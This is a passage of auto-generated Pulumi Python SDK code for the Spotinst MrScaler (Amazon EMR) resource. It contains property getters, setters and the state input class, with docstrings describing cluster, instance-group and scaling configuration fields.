def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
return pulumi.get(self, "provisioning_timeout")
@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "release_label")
@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_min_size", value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_down_policies")
@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_up_policies")
@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@task_unit.setter
def task_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "termination_protected", value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "visible_to_all_users")
@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "visible_to_all_users", value)
@pulumi.input_type
class _MrScalarState:
def __init__(__self__, *,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
output_cluster_id: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering MrScalar resources.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
if additional_info is not None:
pulumi.set(__self__, "additional_info", additional_info)
if additional_primary_security_groups is not None:
pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
if additional_replica_security_groups is not None:
pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
if applications is not None:
pulumi.set(__self__, "applications", applications)
if availability_zones is not None:
pulumi.set(__self__, "availability_zones", availability_zones)
if bootstrap_actions_files is not None:
pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if configurations_files is not None:
pulumi.set(__self__, "configurations_files", configurations_files)
if core_desired_capacity is not None:
pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
if core_ebs_block_devices is not None:
pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
if core_ebs_optimized is not None:
pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
if core_instance_types is not None:
pulumi.set(__self__, "core_instance_types", core_instance_types)
if core_lifecycle is not None:
pulumi.set(__self__, "core_lifecycle", core_lifecycle)
if core_max_size is not None:
pulumi.set(__self__, "core_max_size", core_max_size)
if core_min_size is not None:
pulumi.set(__self__, "core_min_size", core_min_size)
if core_scaling_down_policies is not None:
pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
if core_scaling_up_policies is not None:
pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
if core_unit is not None:
pulumi.set(__self__, "core_unit", core_unit)
if custom_ami_id is not None:
pulumi.set(__self__, "custom_ami_id", custom_ami_id)
if description is not None:
pulumi.set(__self__, "description", description)
if ebs_root_volume_size is not None:
pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
if ec2_key_name is not None:
pulumi.set(__self__, "ec2_key_name", ec2_key_name)
if expose_cluster_id is not None:
pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
if instance_weights is not None:
pulumi.set(__self__, "instance_weights", instance_weights)
if job_flow_role is not None:
pulumi.set(__self__, "job_flow_role", job_flow_role)
if keep_job_flow_alive is not None:
pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
if log_uri is not None:
pulumi.set(__self__, "log_uri", log_uri)
if managed_primary_security_group is not None:
pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
if managed_replica_security_group is not None:
pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
if master_ebs_block_devices is not None:
pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
if master_ebs_optimized is not None:
pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
if master_instance_types is not None:
pulumi.set(__self__, "master_instance_types", master_instance_types)
if master_lifecycle is not None:
pulumi.set(__self__, "master_lifecycle", master_lifecycle)
if master_target is not None:
pulumi.set(__self__, "master_target", master_target)
if name is not None:
pulumi.set(__self__, "name", name)
if output_cluster_id is not None:
pulumi.set(__self__, "output_cluster_id", output_cluster_id)
if provisioning_timeout is not None:
pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
if region is not None:
pulumi.set(__self__, "region", region)
if release_label is not None:
pulumi.set(__self__, "release_label", release_label)
if repo_upgrade_on_boot is not None:
pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_config is not None:
pulumi.set(__self__, "security_config", security_config)
if service_access_security_group is not None:
pulumi.set(__self__, "service_access_security_group", service_access_security_group)
if service_role is not None:
pulumi.set(__self__, "service_role", service_role)
if steps_files is not None:
pulumi.set(__self__, "steps_files", steps_files)
if strategy is not None:
pulumi.set(__self__, "strategy", strategy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if task_desired_capacity is not None:
pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
if task_ebs_block_devices is not None:
pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
if task_ebs_optimized is not None:
pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
if task_instance_types is not None:
pulumi.set(__self__, "task_instance_types", task_instance_types)
if task_lifecycle is not None:
pulumi.set(__self__, "task_lifecycle", task_lifecycle)
if task_max_size is not None:
pulumi.set(__self__, "task_max_size", task_max_size)
if task_min_size is not None:
pulumi.set(__self__, "task_min_size", task_min_size)
if task_scaling_down_policies is not None:
pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
if task_scaling_up_policies is not None:
pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
if task_unit is not None:
pulumi.set(__self__, "task_unit", task_unit)
if termination_policies is not None:
pulumi.set(__self__, "termination_policies", termination_policies)
if termination_protected is not None:
pulumi.set(__self__, "termination_protected", termination_protected)
if visible_to_all_users is not None:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
if visible_to_all_users is not None:
pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> Optional[pulumi.Input[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@additional_info.setter
def additional_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_info", value)
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@additional_primary_security_groups.setter
def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
